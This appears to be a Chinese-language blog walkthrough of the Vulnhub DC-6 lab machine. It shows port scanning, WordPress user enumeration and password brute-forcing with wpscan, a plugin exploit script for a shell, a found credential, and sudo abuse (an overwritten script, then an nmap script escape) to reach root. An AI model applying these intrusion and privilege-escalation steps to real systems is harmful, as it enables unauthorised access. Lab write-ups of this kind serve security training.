首页 > 其他分享 >Vulnhub:DC-6靶机

Vulnhub:DC-6靶机

时间:2023-04-01 17:22:21浏览次数:56  
标签:http -- jens sudo DC Vulnhub home 靶机 txt

kali:192.168.111.111

靶机:192.168.111.247

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.247

image

访问目标80端口发现重定向到http://wordy,修改/etc/hosts之后访问

image

image

使用wpscan爆破目标用户

wpscan --url http://wordy -e u

image

爆破用的密码字典根据作者提示可以进行筛选

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image

爆破出mark用户的密码

wpscan --url http://wordy -U user.txt -P passwords.txt

image

漏洞利用

登录后台后发现存在漏洞的插件

image

image

利用exp拿shell

cp /usr/share/exploitdb/exploits/php/webapps/50110.py .
python3 50110.py

image

提权

在/home/mark/stuff/things-to-do.txt提示用户信息:graham|GSo7isUM1D4

image

切换到graham用户查看sudo权限

image

修改/home/jens/backups.sh文件,切换到jens用户

echo '/bin/bash' > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

image

查看jens用户的sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/nmap/#sudo

TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
chmod 777 /tmp/tmp.zAaLfg44ZA
sudo -u root nmap --script=$TF

image

flag

image

标签:http,--,jens,sudo,DC,Vulnhub,home,靶机,txt
From: https://www.cnblogs.com/ctostm/p/17278958.html

相关文章

  • 命令行工具 nerdctl
    前面我们介绍了可以使用ctr操作管理containerd镜像容器,但是大家都习惯了使用dockercli,ctr使用起来可能还是不太顺手,为了能够让大家更好的转到containerd上面来,社区提供了一个新的命令行工具:nerdctl。nerdctl是一个与dockercli风格兼容的containerd客户端工具,而且......
  • Vulnhub:Hackme:1靶机
    kali:192.168.111.111靶机:192.168.111.245信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.245访问目标80端口,注册用户登陆后在搜索框位置存在sql注入漏洞利用利用sqlmap获得目标数据库信息sqlmap-o-r./a.txt--batch--level5--risk3......
  • LIDC-IDRI肺结节项目 -- 预处理数据集
    实战参考代码:代码一、路径、参数配置(lung.conf)lidc_dicom_path:LIDC_IDRI数据集原始位置 image_path,mask_path:保存处理后的含有结节的肺部图像和掩码图像路径clean_path_image,clean_path_mask:保存处理后的不含有结节的肺部图像和掩码图像路径meta_path:保存结节元......
  • CloudCanal 落地 DB2 数据迁移同步功能
    简述Db2是一款具有悠久历史的关系型数据库,由IBM公司开发和维护,广泛应用于金融级业务场景。CloudCanal近期提供了Db2为源端的数据迁移同步功能,用户可以便利地将Db2中数据实时同步到其他数据库,实现数据更广泛、更实时的应用。功能介绍目标数据库和能力目标端数据源......
  • DC-DC直流线性可调升压模块高压稳压输出电源5v12v24v48v转0-300V0-500V/0-600V/0-1000
    GRB系列非隔离宽电压输入高电压稳压输出特点 效率高达75%以上 1*2英寸标准封装 单电压输出 可直接焊在PCB上 工作温度:-40℃~+75℃ 阻燃封装,满足UL94-V0要求 温度特性好 电压控制输出,输出电压随控制电压的变化线应用GRB系列模块电源是一种DC-DC升压变换器。该模块电......
  • 三相PFC程序30KW充电桩的500~1000Vdc 0~60A,绝对与实物一致的30KW三相PFC程序
    三相PFC程序30KW充电桩的500~1000Vdc0~60A,绝对与实物一致的30KW三相PFC程序。一、在技术指标参数中,若发现程序中并没有的,全额退款。二、文件资料包括:1、原理图,AltiumDesigner10格式。2、bom表。3、整个CCS工程项目文件,C语言源程序。4、量产机的详细测试报告一份,共27页。一、PFC主......
  • broadcom Ethernet BCM57412 驱动更新记录(dkms方式)
    一背景现场DellR740xd2机器使用网卡Broadcom5741210GbSFP+,固件版本22.21.06.80。bnxt_en.ko内核模块是该网卡的驱动,我们默认的驱动版本为1.8.0,而固件版本22.21.06.80需要1.10.2的driver。本文主要是记录一些操作步骤,后续出现类似驱动过旧的问题可以快速解决。二临时解......
  • android 监听SDCard安装和卸载的代…
    //监听类privatefinalBroadcastReceiversdcardListener=newBroadcastReceiver(){@OverridepublicvoidonReceive(Contextcontext,Intentintent){Stringaction=intent.getAction();Log.d("TAG","sdcar......
  • Livestream Broadcaster:整合在线服务的高清视频编码器
    Livestream是一家提供现场视频流服务的创业公司,近日发布了一个价值495美金的视频编码器Broadcaster,几乎能连接任何摄像头,通过WiFi或任何网无线USB调制解调器将高清视频直接......
  • 10bit 高速SAR ADC基于0.18um工艺的电路,拿去直接可以仿真性能
    10bit高速SARADC基于0.18um工艺的电路,拿去直接可以仿真性能,有效位ENOB9.6bit,SFDR为63.7dB,逐次逼近型模数转换器基于virtuoso。YID:66488681365604427......